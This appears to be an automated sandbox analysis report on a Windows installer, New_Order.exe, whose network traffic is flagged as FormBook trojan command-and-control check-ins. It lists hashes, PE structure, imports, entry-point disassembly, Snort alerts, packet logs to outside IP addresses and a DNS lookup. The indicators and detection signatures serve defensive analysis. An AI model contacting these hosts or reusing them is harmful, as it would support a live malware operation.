                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 45%
                                                                      Reputation:low
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................PE..L......`...........!......................... ...............................@....................................... ..T....!....................................... ............................................... ...............................text............................... ..`.rdata....... ......................@..@.data... ....0......................@...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\p4uvvpfyo5r9igyk
                                                                      Process:C:\Users\user\Desktop\New_Order.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):164864
                                                                      Entropy (8bit):7.998945413738887
                                                                      Encrypted:true
                                                                      SSDEEP:3072:Tbz4IUuyr/iFThKRJq8haAGTnGhqPzj9C+a446GjKcAvBMQ4CNel:TbzR/ACYRJq8uTGAli4EKVvBMSkl
                                                                      MD5:1842785601112C137E81EA60E9504A13
                                                                      SHA1:904245EBB63CF1FF6DF3461026C179A7B1E9083B
                                                                      SHA-256:CE4A558A3F3B767B8E041794A63587145306752BCB2C990200CD6C48DB3C610E
                                                                      SHA-512:19A0EF1E359E041B0C6E6FEC991E26CB16BFDDC705F8A1C63D3F4C5B0A94A8B1BD1CC935659E637E446F3132A2EF440B38CD90716DBB950169C591337B3218D0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: ..(..g.....s.V@..9n.h.9.#..W....".}.......Q.Q....8z.{jyX.i.T-....6D...@...U...D.....c.|9.e.R1%..*.MG..H!1..@..^_...uF.......%.!.:~d.......^..>.d.L)..3..*...J(W...i..............9.:.u...u.2.?h..N.;P.;.].M......B.r..<Qy.S.g..Uf&..6.....Y....-R3..|U../.3.p.~x.)*={)7g......x.=...T..<.O+.2..`....RgOM.(4.G\..j..c.&.Tb.c..s...~..9v.aqT....5..2..\.:.S.O....S.2xi{.~OM.....*g..\...x.?.'N....\.I....H...2.&...Z.n.0.....!.1.Td{'{;p.}..%.$aZ.Wo......r.*.fn.............q..dq..V.....W@mD`].f-.v.E."XUgL..7.R......J.."....la.z..6....Zu.:.S+.]K..~/.Hy.e.V...|.>,f.9...&....\!......0..w?U...2O..2l...5..<..=N..GV.y.......Q...%9..&k..%.YMm7....(.p....z4Od....T$....$k....04....@7......OY..!.?.....>....xT.%.W.Q. ....?."..m....@...(..!..-.WpRF.30c).....C;.U..._l......68...I.G.y...w?b...B4...f.}....C.V.LtTvb....T.ey.G.'..O..CH.........S.$N..aP..h.....i......]t..._.....j........4.wp....[..=8.lb..?D.. .Q..Q..PU.^;....pU):,...d=...w......F..4...3...r.F.X..h.?..

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Entropy (8bit):7.551360925759815
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:New_Order.exe
                                                                      File size:344003
                                                                      MD5:74e4eb9afbf8f9c9b285a46ced831979
                                                                      SHA1:8d65df9dc971c859f0a86a158d9576f528603410
                                                                      SHA256:68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
                                                                      SHA512:14c0dd32728a4e0a7cc1ceead7f78773e599000facf25dddbcd00404674ca97742784734433d5a858ca0063b57e678c599d664a16183798b4e607ff3557b0968
                                                                      SSDEEP:6144:f9X0Gni/KtKNZIcxjbzR/ACYRJq8uTGAli4EKVvBMSk6:p0MtKNZlXR/36JQTXvvV5MI
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...|......H3............@

                                                                      File Icon

                                                                      Icon Hash:960d4b6e0f3e3642

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x403348
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:ced282d9b261d1462772017fe2f6972b

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      sub esp, 00000184h
                                                                      push ebx
                                                                      push esi
                                                                      push edi
                                                                      xor ebx, ebx
                                                                      push 00008001h
                                                                      mov dword ptr [esp+18h], ebx
                                                                      mov dword ptr [esp+10h], 0040A198h
                                                                      mov dword ptr [esp+20h], ebx
                                                                      mov byte ptr [esp+14h], 00000020h
                                                                      call dword ptr [004080B8h]
                                                                      call dword ptr [004080BCh]
                                                                      and eax, BFFFFFFFh
                                                                      cmp ax, 00000006h
                                                                      mov dword ptr [0042F42Ch], eax
                                                                      je 00007FE4D08F1223h
                                                                      push ebx
                                                                      call 00007FE4D08F4386h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1219h
                                                                      push 00000C00h
                                                                      call eax
                                                                      mov esi, 004082A0h
                                                                      push esi
                                                                      call 00007FE4D08F4302h
                                                                      push esi
                                                                      call dword ptr [004080CCh]
                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                      cmp byte ptr [esi], bl
                                                                      jne 00007FE4D08F11FDh
                                                                      push 0000000Bh
                                                                      call 00007FE4D08F435Ah
                                                                      push 00000009h
                                                                      call 00007FE4D08F4353h
                                                                      push 00000007h
                                                                      mov dword ptr [0042F424h], eax
                                                                      call 00007FE4D08F4347h
                                                                      cmp eax, ebx
                                                                      je 00007FE4D08F1221h
                                                                      push 0000001Eh
                                                                      call eax
                                                                      test eax, eax
                                                                      je 00007FE4D08F1219h
                                                                      or byte ptr [0042F42Fh], 00000040h
                                                                      push ebp
                                                                      call dword ptr [00408038h]
                                                                      push ebx
                                                                      call dword ptr [00408288h]
                                                                      mov dword ptr [0042F4F8h], eax
                                                                      push ebx
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push 00000160h
                                                                      push eax
                                                                      push ebx
                                                                      push 00429850h
                                                                      call dword ptr [0040816Ch]
                                                                      push 0040A188h

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x21248.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x64570x6600False0.66823682598data6.43498570321IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x80000x13800x1400False0.4625data5.26100389731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0xa0000x255380x600False0.463541666667data4.133728555IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                      .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x380000x212480x21400False0.430987135808data6.43392115595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_ICON0x382800x10828dataEnglishUnited States
                                                                      RT_ICON0x48aa80x849dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                      RT_ICON0x50f480x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 4293848814, next used block 4294638330EnglishUnited States
                                                                      RT_ICON0x551700x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4294046193, next used block 4294638330EnglishUnited States
                                                                      RT_ICON0x577180x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4294309365, next used block 4294375158EnglishUnited States
                                                                      RT_ICON0x587c00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                      RT_DIALOG0x58c280x100dataEnglishUnited States
                                                                      RT_DIALOG0x58d280x11cdataEnglishUnited States
                                                                      RT_DIALOG0x58e480x60dataEnglishUnited States
                                                                      RT_GROUP_ICON0x58ea80x5adataEnglishUnited States
                                                                      RT_MANIFEST0x58f080x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                      Imports

                                                                      DLLImport
                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      05/12/21-06:10:52.777667TCP1201ATTACK-RESPONSES 403 Forbidden804971675.2.115.196192.168.2.5
                                                                      05/12/21-06:10:57.964155TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:57.964155TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:57.964155TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.591.148.168.141
                                                                      05/12/21-06:10:58.051840TCP1201ATTACK-RESPONSES 403 Forbidden804971791.148.168.141192.168.2.5
                                                                      05/12/21-06:11:08.305754TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:08.305754TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:08.305754TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.562.149.189.71
                                                                      05/12/21-06:11:13.647635TCP1201ATTACK-RESPONSES 403 Forbidden804971923.227.38.74192.168.2.5
                                                                      05/12/21-06:11:18.796605TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:18.796605TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:18.796605TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.585.233.160.22
                                                                      05/12/21-06:11:30.171286TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:30.171286TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:30.171286TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972580192.168.2.58.210.40.49
                                                                      05/12/21-06:11:45.772072TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.772072TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.772072TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.534.102.136.180
                                                                      05/12/21-06:11:45.909532TCP1201ATTACK-RESPONSES 403 Forbidden804972734.102.136.180192.168.2.5

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 06:10:52.578253031 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.618907928 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.620045900 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.620214939 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.660700083 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.777667046 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.777733088 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.778031111 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.778270006 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.807538986 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:52.807683945 CEST4971680192.168.2.575.2.115.196
                                                                      May 12, 2021 06:10:52.818757057 CEST804971675.2.115.196192.168.2.5
                                                                      May 12, 2021 06:10:57.887156010 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:57.963726997 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:57.963977098 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:57.964154959 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.044265032 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.051840067 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.051858902 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:10:58.052031040 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.052119970 CEST4971780192.168.2.591.148.168.141
                                                                      May 12, 2021 06:10:58.128576040 CEST804971791.148.168.141192.168.2.5
                                                                      May 12, 2021 06:11:08.246844053 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.305356979 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.305533886 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.305753946 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.362505913 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.363512993 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.363538980 CEST804971862.149.189.71192.168.2.5
                                                                      May 12, 2021 06:11:08.363763094 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.363837004 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:08.665510893 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:09.275211096 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:10.478286028 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:12.884835958 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:13.437242985 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.482142925 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.482316017 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.482528925 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.526175022 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647634983 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647696972 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647722960 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647748947 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647768021 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.647921085 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.648022890 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.648037910 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.648087978 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:13.651108027 CEST804971923.227.38.74192.168.2.5
                                                                      May 12, 2021 06:11:13.651184082 CEST4971980192.168.2.523.227.38.74
                                                                      May 12, 2021 06:11:17.697598934 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:18.743036985 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.795769930 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.796403885 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.796605110 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.848905087 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.849797010 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.849983931 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:18.850141048 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.850188017 CEST4972080192.168.2.585.233.160.22
                                                                      May 12, 2021 06:11:18.904484034 CEST804972085.233.160.22192.168.2.5
                                                                      May 12, 2021 06:11:24.164902925 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.480098009 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.480214119 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.480335951 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.793428898 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793498039 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793528080 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:24.793703079 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:24.795022964 CEST4972480192.168.2.5150.95.255.38
                                                                      May 12, 2021 06:11:25.107990026 CEST8049724150.95.255.38192.168.2.5
                                                                      May 12, 2021 06:11:27.307744980 CEST4971880192.168.2.562.149.189.71
                                                                      May 12, 2021 06:11:29.894157887 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.170943022 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.171107054 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.171286106 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.447992086 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448025942 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448041916 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:30.448206902 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.448276997 CEST4972580192.168.2.58.210.40.49
                                                                      May 12, 2021 06:11:30.725559950 CEST80497258.210.40.49192.168.2.5
                                                                      May 12, 2021 06:11:45.730526924 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.771503925 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.771606922 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.772072077 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.813093901 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909532070 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909596920 CEST804972734.102.136.180192.168.2.5
                                                                      May 12, 2021 06:11:45.909837008 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.909900904 CEST4972780192.168.2.534.102.136.180
                                                                      May 12, 2021 06:11:45.950901031 CEST804972734.102.136.180192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 12, 2021 06:09:34.283843994 CEST6434453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:34.335406065 CEST53643448.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:34.902295113 CEST6206053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:34.959502935 CEST53620608.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:35.709083080 CEST6180553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:35.762042999 CEST53618058.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:37.292479992 CEST5479553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:37.341233015 CEST53547958.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:37.589746952 CEST4955753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:37.649698973 CEST53495578.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:39.478003025 CEST6173353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:39.526659012 CEST53617338.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:40.772716045 CEST6544753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:40.821523905 CEST53654478.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:42.004847050 CEST5244153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:42.053600073 CEST53524418.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:43.216428995 CEST6217653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:43.265111923 CEST53621768.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:45.508809090 CEST5959653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:45.557526112 CEST53595968.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:47.106349945 CEST6529653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:47.157958031 CEST53652968.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:48.625264883 CEST6318353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:48.673979998 CEST53631838.8.8.8192.168.2.5
                                                                      May 12, 2021 06:09:49.491476059 CEST6015153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:09:49.551354885 CEST53601518.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:00.726229906 CEST5696953192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:00.786649942 CEST53569698.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:21.639175892 CEST5516153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:21.707287073 CEST53551618.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:49.304970980 CEST5475753192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:49.363789082 CEST53547578.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:52.420631886 CEST4999253192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:52.571346045 CEST53499928.8.8.8192.168.2.5
                                                                      May 12, 2021 06:10:57.795087099 CEST6007553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:10:57.885720015 CEST53600758.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:03.061557055 CEST5501653192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:03.124828100 CEST53550168.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:08.172087908 CEST6434553192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:08.245578051 CEST53643458.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:13.373060942 CEST5712853192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:13.436161995 CEST53571288.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:18.654652119 CEST5479153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:18.741679907 CEST53547918.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:20.400882006 CEST5046353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:20.475410938 CEST53504638.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:22.926269054 CEST5039453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:22.985301018 CEST53503948.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:23.877700090 CEST5853053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:24.163995981 CEST53585308.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:29.830585957 CEST5381353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:29.892627001 CEST53538138.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:35.455265045 CEST6373253192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:35.520087004 CEST53637328.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:40.179445982 CEST5734453192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:40.244952917 CEST53573448.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:40.564667940 CEST5445053192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:40.639816046 CEST53544508.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:45.658201933 CEST5926153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:45.726883888 CEST53592618.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:50.920507908 CEST5715153192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:51.080497026 CEST53571518.8.8.8192.168.2.5
                                                                      May 12, 2021 06:11:56.217856884 CEST5941353192.168.2.58.8.8.8
                                                                      May 12, 2021 06:11:56.303303003 CEST53594138.8.8.8192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                      May 12, 2021 06:10:52.420631886 CEST192.168.2.58.8.8.80xbbd8Standard query (0)www.roastedorganic.comA (IP address)IN (0x0001)
